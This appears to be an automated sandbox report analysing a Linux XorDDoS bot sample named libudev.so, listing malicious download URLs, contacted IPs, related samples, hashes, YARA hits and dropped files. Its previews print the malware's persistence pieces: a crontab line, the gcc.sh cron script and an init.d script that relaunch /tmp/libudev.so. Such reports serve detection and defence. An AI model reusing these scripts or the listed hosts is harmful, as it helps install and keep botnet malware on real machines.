http://www.gnu.org/software/libc/bugs.html	libudev.so, hfdnmorvjd.11.dr, trcmbxxcta.11.dr, mljnlxkfff.11.dr, ypclxoxcxk.11.dr, fsqerkomug.11.dr, jjfbelholv.11.dr, cjrbrkowir.11.dr, ctwojuywol.11.dr, bnuowhwlvc.11.dr, chrcfbeejh.11.dr, libudev.so0.11.dr, uijxdyxaco.11.dr, uhyqxsqece.11.dr, tiupbsaswr.11.dr	false		high
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9cj	libudev.so, 6351.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6354.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6356.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6359.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6362.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp	true	Avira URL Cloud: malware	unknown
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9hr	libudev.so, 6512.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6515.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6517.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6520.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6523.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp	true	Avira URL Cloud: malware	unknown
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9bn	libudev.so, 6441.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6444.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6447.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6450.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6452.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp	true	Avira URL Cloud: malware	unknown
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9fs	libudev.so, 6334.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6337.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6339.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6342.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6345.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp	true	Avira URL Cloud: malware	unknown
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9jj	libudev.so, 6280.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6283.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6286.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6289.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6291.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp	true	Avira URL Cloud: malware	unknown
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9ml	libudev.so, 6263.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6266.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6268.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6271.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6273.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp	true	Avira URL Cloud: malware	unknown
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9mo	libudev.so, 6495.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6498.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6501.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6503.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6506.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp	true	Avira URL Cloud: malware	unknown
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9/t	libudev.so, 6230.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6232.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6233.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6234.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp	true	Avira URL Cloud: malware	unknown
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9ch	libudev.so, 6459.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6462.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6464.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6468.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6470.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp	true	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
54.36.15.99	www1.gggatat456.com	France		16276	OVHFR	true
109.202.202.202	unknown	Switzerland		13030	INIT7CH	false
51.89.52.12	unknown	France		16276	OVHFR	false
91.189.91.43	unknown	United Kingdom		41231	CANONICAL-ASGB	false
91.189.91.42	unknown	United Kingdom		41231	CANONICAL-ASGB	false

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
54.36.15.99	0Xorddos.o	Get hash	malicious	Browse	www1.gggatat456.com/dd.rar
109.202.202.202	arm7-20220709-1550	Get hash	malicious	Browse
	arm-20220709-1550	Get hash	malicious	Browse
	x86-20220709-1550	Get hash	malicious	Browse
	WeKyWo9tMr	Get hash	malicious	Browse
	u2yPE4ulqU	Get hash	malicious	Browse
	abzFDQzHwA	Get hash	malicious	Browse
	9FeNxlC5VP	Get hash	malicious	Browse
	sFSyiH2hxv	Get hash	malicious	Browse
	Cqr4aAWtE3	Get hash	malicious	Browse
	boVTvIxPsp	Get hash	malicious	Browse
	J72xDpBPAj	Get hash	malicious	Browse
	IvLOIlinPd	Get hash	malicious	Browse
	HPCKmtqDld	Get hash	malicious	Browse
	iRXU7KbQLU	Get hash	malicious	Browse
	YUNdqEb6fk	Get hash	malicious	Browse
	home.arm6-20220709-1259	Get hash	malicious	Browse
	home.mpsl-20220709-1300	Get hash	malicious	Browse
	home.arm5-20220709-1300	Get hash	malicious	Browse
	home.x86-20220709-1250	Get hash	malicious	Browse
	home.mips-20220709-1300	Get hash	malicious	Browse
51.89.52.12	0Xorddos.o	Get hash	malicious	Browse
91.189.91.43	arm7-20220709-1550	Get hash	malicious	Browse
	arm-20220709-1550	Get hash	malicious	Browse
	x86-20220709-1550	Get hash	malicious	Browse
	WeKyWo9tMr	Get hash	malicious	Browse
	u2yPE4ulqU	Get hash	malicious	Browse
	abzFDQzHwA	Get hash	malicious	Browse
	9FeNxlC5VP	Get hash	malicious	Browse
	sFSyiH2hxv	Get hash	malicious	Browse
	Cqr4aAWtE3	Get hash	malicious	Browse
	boVTvIxPsp	Get hash	malicious	Browse
	J72xDpBPAj	Get hash	malicious	Browse
	IvLOIlinPd	Get hash	malicious	Browse
	HPCKmtqDld	Get hash	malicious	Browse
	iRXU7KbQLU	Get hash	malicious	Browse
	YUNdqEb6fk	Get hash	malicious	Browse
	home.arm6-20220709-1259	Get hash	malicious	Browse
	home.mpsl-20220709-1300	Get hash	malicious	Browse
	home.arm5-20220709-1300	Get hash	malicious	Browse
	home.x86-20220709-1250	Get hash	malicious	Browse
	home.mips-20220709-1300	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
ppp.xxxatat456.com	0Xorddos.o	Get hash	malicious	Browse	79.137.1.132
	libudev.so	Get hash	malicious	Browse	151.80.176.165
	TPHM5fHHv1	Get hash	malicious	Browse	51.38.200.186
www1.gggatat456.com	xor1.o	Get hash	malicious	Browse	54.36.15.99
	0Xorddos.o	Get hash	malicious	Browse	54.36.15.99
	http://www1.gggatat456.com/dd.rar	Get hash	malicious	Browse	51.68.183.108
	w.txt	Get hash	malicious	Browse	92.222.83.172
	w.txt	Get hash	malicious	Browse	92.222.83.172
	1433.bin	Get hash	malicious	Browse	91.134.134.116
	libudev.so	Get hash	malicious	Browse	91.134.134.116
	TPHM5fHHv1	Get hash	malicious	Browse	51.77.240.165

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
OVHFR	abzFDQzHwA	Get hash	malicious	Browse	51.68.137.177
	KW0mMJHX31	Get hash	malicious	Browse	217.182.96.34
	DB50D646494970B78887D4D84F52147C4CDBAA0B23CB4.exe	Get hash	malicious	Browse	217.182.208.40
	SB8iEj89bZ.exe	Get hash	malicious	Browse	51.89.16.8
	EA26kwLQHE.exe	Get hash	malicious	Browse	91.134.184.195
	4kvcuVD5jt.exe	Get hash	malicious	Browse	91.134.184.195
	K0jhk7XA76.dll	Get hash	malicious	Browse	54.37.228.122
	rmRMQ5rfby.dll	Get hash	malicious	Browse	54.37.228.122
	dps6GhLM6K.dll	Get hash	malicious	Browse	54.37.228.122
	vFIcuFD2PD.dll	Get hash	malicious	Browse	54.37.228.122
	uyvZt51na3.dll	Get hash	malicious	Browse	54.37.228.122
	K0jhk7XA76.dll	Get hash	malicious	Browse	54.37.228.122
	LycZTx0WaJ.dll	Get hash	malicious	Browse	54.37.228.122
	6ttMM5dkAS.dll	Get hash	malicious	Browse	54.37.228.122
	pXdiSYVkq0.dll	Get hash	malicious	Browse	54.37.228.122
	YzY4Tgb2Zt.dll	Get hash	malicious	Browse	54.37.228.122
	6ttMM5dkAS.dll	Get hash	malicious	Browse	54.37.228.122
	AVANCIE.xls	Get hash	malicious	Browse	94.23.45.86
	https://iconicdesignstudio.co.in/	Get hash	malicious	Browse	51.210.113.204
	aqua.arm	Get hash	malicious	Browse	213.32.50.248
INIT7CH	arm7-20220709-1550	Get hash	malicious	Browse	109.202.202.202
	arm-20220709-1550	Get hash	malicious	Browse	109.202.202.202
	x86-20220709-1550	Get hash	malicious	Browse	109.202.202.202
	WeKyWo9tMr	Get hash	malicious	Browse	109.202.202.202
	u2yPE4ulqU	Get hash	malicious	Browse	109.202.202.202
	abzFDQzHwA	Get hash	malicious	Browse	109.202.202.202
	9FeNxlC5VP	Get hash	malicious	Browse	109.202.202.202
	sFSyiH2hxv	Get hash	malicious	Browse	109.202.202.202
	Cqr4aAWtE3	Get hash	malicious	Browse	109.202.202.202
	boVTvIxPsp	Get hash	malicious	Browse	109.202.202.202
	J72xDpBPAj	Get hash	malicious	Browse	109.202.202.202
	IvLOIlinPd	Get hash	malicious	Browse	109.202.202.202
	HPCKmtqDld	Get hash	malicious	Browse	109.202.202.202
	iRXU7KbQLU	Get hash	malicious	Browse	109.202.202.202
	YUNdqEb6fk	Get hash	malicious	Browse	109.202.202.202
	home.arm6-20220709-1259	Get hash	malicious	Browse	109.202.202.202
	home.mpsl-20220709-1300	Get hash	malicious	Browse	109.202.202.202
	home.arm5-20220709-1300	Get hash	malicious	Browse	109.202.202.202
	home.x86-20220709-1250	Get hash	malicious	Browse	109.202.202.202
	home.mips-20220709-1300	Get hash	malicious	Browse	109.202.202.202

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
/etc/cron.hourly/gcc.sh	23.vir	Get hash	malicious	Browse
	23.vir	Get hash	malicious	Browse
	xor1.o	Get hash	malicious	Browse
	CCCxor.o	Get hash	malicious	Browse
	2BAFxor.o	Get hash	malicious	Browse
	task2.bin	Get hash	malicious	Browse
	task2.bin	Get hash	malicious	Browse
	task2.bin	Get hash	malicious	Browse
	0Xorddos.o	Get hash	malicious	Browse
	x.o	Get hash	malicious	Browse
	23	Get hash	malicious	Browse
	23	Get hash	malicious	Browse
	XZFWLZVF1Z	Get hash	malicious	Browse
	EgrT0zBhDa	Get hash	malicious	Browse
	4ljhdTTyiA	Get hash	malicious	Browse
	7nJAEBDitl	Get hash	malicious	Browse
	ygljglkjgfg0	Get hash	malicious	Browse
	bVexvNSHcD	Get hash	malicious	Browse
	rJabrNEtBM	Get hash	malicious	Browse
	c1152b89-b68a-49af-af67-fd4b61683a72	Get hash	malicious	Browse

Created / dropped Files

/etc/cron.hourly/gcc.sh

Process:	/tmp/libudev.so
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	228
Entropy (8bit):	4.807897441464882
Encrypted:	false
SSDEEP:	3:TKH4v1kxtsLNELQ9YmPQnMLnVMPQmlZnEMFaGZg28Xwf6SkCVcLNGLC75pkVKJdm:htiy4Mrm9lVNy28XbCVP270gJdE/v
MD5:	3BAB747CEDC5F0EBE86AAA7F982470CD
SHA1:	3C7D1C6931C2B3DAE39D38346B780EA57C8E6142
SHA-256:	74D31CAC40D98EE64DF2A0C29CEB229D12AC5FA699C2EE512FC69360F0CF68C5
SHA-512:	21E8A6D9CA8531D37DEF83D8903E5B0FA11ECF33D85D05EDAB1E0FEB4ACAC65AE2CF5222650FB9F533F459CCC51BB2903276FF6F827B847CC5E6DAC7D45A0A42
Malicious:	true
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 28%
Joe Sandbox View:	Filename: 23.vir, Detection: malicious, Browse Filename: 23.vir, Detection: malicious, Browse Filename: xor1.o, Detection: malicious, Browse Filename: CCCxor.o, Detection: malicious, Browse Filename: 2BAFxor.o, Detection: malicious, Browse Filename: task2.bin, Detection: malicious, Browse Filename: task2.bin, Detection: malicious, Browse Filename: task2.bin, Detection: malicious, Browse Filename: 0Xorddos.o, Detection: malicious, Browse Filename: x.o, Detection: malicious, Browse Filename: 23, Detection: malicious, Browse Filename: 23, Detection: malicious, Browse Filename: XZFWLZVF1Z, Detection: malicious, Browse Filename: EgrT0zBhDa, Detection: malicious, Browse Filename: 4ljhdTTyiA, Detection: malicious, Browse Filename: 7nJAEBDitl, Detection: malicious, Browse Filename: ygljglkjgfg0, Detection: malicious, Browse Filename: bVexvNSHcD, Detection: malicious, Browse Filename: rJabrNEtBM, Detection: malicious, Browse Filename: c1152b89-b68a-49af-af67-fd4b61683a72, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	#!/bin/sh.PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin.for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done.cp /lib/libudev.so /lib/libudev.so.6./lib/libudev.so.6.

/etc/crontab

Process:	/bin/sh
File Type:	ASCII text
Category:	dropped
Size (bytes):	41
Entropy (8bit):	3.8484226636198593
Encrypted:	false
SSDEEP:	3:FFP13tKebPv4KFcKv:/P1IebPPFcKv
MD5:	636299E19F3BFB8CDA661BC956C1CE7F
SHA1:	2B45273CCBFE139D58FC3554D6943D4338C18E15
SHA-256:	8CBDE8A027F2887DD7A3C5C6F98FDF127BAE31FE457FEF9D7945C9E48D195F44
SHA-512:	41AF1A49B86C9C81965AF32B404494CC5072AFDA004F385977110F8EA134A770650CBD2F9617AFCD87D6744954659BE4AE365E65DCA4491A375275E710310F1A
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	/3 * * * root /etc/cron.hourly/gcc.sh.

/etc/init.d/libudev.so

Process:	/tmp/libudev.so
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	315
Entropy (8bit):	5.211867359465572
Encrypted:	false
SSDEEP:	6:hUtoFdU9JfdnsKheJsKGBE21YJvmNeMwhcBZv1DzRIMMHU06Mz/MHUQ4:63VmQBEMO1cB/zuVRzue
MD5:	BF54F9789E5F436B41DAE0338B907708
SHA1:	A1D61DC0A80DB7AC81BAF8772E4DDD076CB6706B
SHA-256:	F48633BD1909A10D98BDF0C032CB414EE35185365C036130DB1C058D2D9B2232
SHA-512:	5F8218AA3A450BB307095203493CC8C09C1640BDBB534BFEC659B0790BAA46E87A61A4133C9E264ECC3CE22AB42898843724CCEA26110A88F550F49DAFBACE7E
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /etc/init.d/libudev.so, Author: Joe Security Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /etc/init.d/libudev.so, Author: ditekSHen Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /etc/init.d/libudev.so, Author: Akamai CSIRT
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	#!/bin/sh.# chkconfig: 12345 90 90.# description: libudev.so.### BEGIN INIT INFO.# Provides:..libudev.so.# Required-Start:..# Required-Stop:..# Default-Start:.1 2 3 4 5.# Default-Stop:...# Short-Description:.libudev.so.### END INIT INFO.case $1 in.start)../tmp/libudev.so..;;.stop)..;;.*)../tmp/libudev.so..;;.esac.

/memfd:snapd-env-generator (deleted)

Process:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File Type:	ASCII text
Category:	dropped
Size (bytes):	76
Entropy (8bit):	3.7627880354948586
Encrypted:	false
SSDEEP:	3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
MD5:	D86A1F5765F37989EB0EC3837AD13ECC
SHA1:	D749672A734D9DEAFD61DCA501C6929EC431B83E
SHA-256:	85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
SHA-512:	338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.

/run/gcc.pid

Process:	/tmp/libudev.so
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	32
Entropy (8bit):	3.8667292966721747
Encrypted:	false
SSDEEP:	3:hxkNLCBe3eJn:3Be3eJ
MD5:	178357FF9498F2924C0B166350B68EF8
SHA1:	04B37951723D56937BEC2CFBAC7D305D8B48D643
SHA-256:	C546B70A2AF029501ED397D6E1B6CA13DFFDF3BCB4D70A6F527B84B287CF9335
SHA-512:	C1EF19315A51378335FD9408740FC831ACEE2C9C4A487272AD744B17CF13C5D225FAECD923354521C4C92834449D8425AE2C3AD44ABD3B3F46C0811897A1A003
Malicious:	false
Reputation:	low
Preview:	hpdeqahpgbcapebgwhuhvgxpxsmyeuxn

/usr/bin/bnuowhwlvc

Process:	/tmp/libudev.so
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
Category:	dropped
Size (bytes):	625878
Entropy (8bit):	6.2444116274548
Encrypted:	false
SSDEEP:	12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrr4T6yF8EEP4UlUuTh1A2:FBXmkN/+Fhu/Qo4h9L+zNN4BVEBl/917
MD5:	9731334739440E32B8E810CCDDD96C17
SHA1:	C2DC6EAD22CB26294ED5900E7A55CA0115570CEE
SHA-256:	57FB6B122CA587AA9BBCF3AFC7E69A0E59ED20004CE1DA3255F133AF825C34FA
SHA-512:	8220A29E82CC269D5F9252507470F55814879F2D296FC47C54EE14737FAA8F1D517CF86671D1D836A011BC2194AF259642ABA17964AE1D4C5F732C58669AD3D7
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/bnuowhwlvc, Author: Joe Security Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/bnuowhwlvc, Author: ditekSHen Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/bnuowhwlvc, Author: Akamai CSIRT
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....

/usr/bin/chrcfbeejh

Process:	/tmp/libudev.so
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
Category:	dropped
Size (bytes):	625878
Entropy (8bit):	6.244410674220444
Encrypted:	false
SSDEEP:	12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrr4T6yF8EEP4UlUuTh1AY:FBXmkN/+Fhu/Qo4h9L+zNN4BVEBl/91F
MD5:	CD015FF5581523F795A9CDFF85751E4E
SHA1:	5B557133107AD96754926D7657E213C74CAD8C3B
SHA-256:	4144C42F7B0BEF3AB02F53EE82E5D2C10566BD007FF35EF47A2D264AD353C184
SHA-512:	955277B6C7705B58138CE98F8586A06F51B915B4D7E9B303FA7F7558AD174B3F1FB47E2BD4855684E743AABFF448C37F95FA7074158099DAB868620586FCFE1A
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/chrcfbeejh, Author: Joe Security Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/chrcfbeejh, Author: ditekSHen Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/chrcfbeejh, Author: Akamai CSIRT
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....

/usr/bin/cjrbrkowir

Process:	/tmp/libudev.so
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
Category:	dropped
Size (bytes):	625878
Entropy (8bit):	6.244399538636041
Encrypted:	false
SSDEEP:	12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrr4T6yF8EEP4UlUuTh1AJ:FBXmkN/+Fhu/Qo4h9L+zNN4BVEBl/91U
MD5:	671FB9E6C4188B2C387307EE031F7816
SHA1:	CC0E122850BADABC5BEB48F71D28311C89427E2C
SHA-256:	1FD66F398B574A5DAF73CD5DAF9B15E57791F9938DBC766994D01727BC5F181C
SHA-512:	074C4C63522E60CBEFBA956326D818670D5E7E8456ABF2230471638CD3C99A56A80EF2C698515B3BD8BB5878F03BA44B93821CB06996AE1B4112A438D9A793D4
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/cjrbrkowir, Author: Joe Security Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/cjrbrkowir, Author: ditekSHen Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/cjrbrkowir, Author: Akamai CSIRT
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....

/usr/bin/ctwojuywol

Process:	/tmp/libudev.so
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
Category:	dropped
Size (bytes):	625878
Entropy (8bit):	6.24439559594153
Encrypted:	false
SSDEEP:	12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrr4T6yF8EEP4UlUuTh1Ag:FBXmkN/+Fhu/Qo4h9L+zNN4BVEBl/91Z
MD5:	637B8BB85E23041FE2F4A3767C0E251B
SHA1:	F5810DD48CDBBD8FC4FFC3DCA2999597AFCAE0C1
SHA-256:	F86589362D67A622DAB30F561B2257CDBA45E10D1D59FE4868A6469652275FF8
SHA-512:	6BEE406D40D31F474F38EA62353CD48686A0CBDFDA28B680D3776D2894DD8DA7ECAAACFD5FFDAF84DB44A906B31EFA282D053D4767D7DDC01BBAC4207B6E4BEF
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/ctwojuywol, Author: Joe Security Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/ctwojuywol, Author: ditekSHen Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/ctwojuywol, Author: Akamai CSIRT
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....

/usr/bin/fsqerkomug

Process:	/tmp/libudev.so
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
Category:	dropped
Size (bytes):	625878
Entropy (8bit):	6.244401429953211
Encrypted:	false
SSDEEP:	12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrr4T6yF8EEP4UlUuTh1AR:FBXmkN/+Fhu/Qo4h9L+zNN4BVEBl/91I
MD5:	E446FFF5F449758979147B09C39CEF27
SHA1:	2291B21642E3A51FF57075133363EA9300B98A93
SHA-256:	E97D595ECDBC961B140AA64E460FA8A1D851D4220DAA01AA91A2FCA5FC2078D3
SHA-512:	B7248A1C007AA47CB794B337FA95569C08D5EBD52EE6C281BB9FA2AADDF6414ABCB28FCA06B1DB62D183D1F9AE05F879DA8F21116B575A2FD3EDC60893F45DE2
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/fsqerkomug, Author: Joe Security Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/fsqerkomug, Author: ditekSHen Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/fsqerkomug, Author: Akamai CSIRT
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
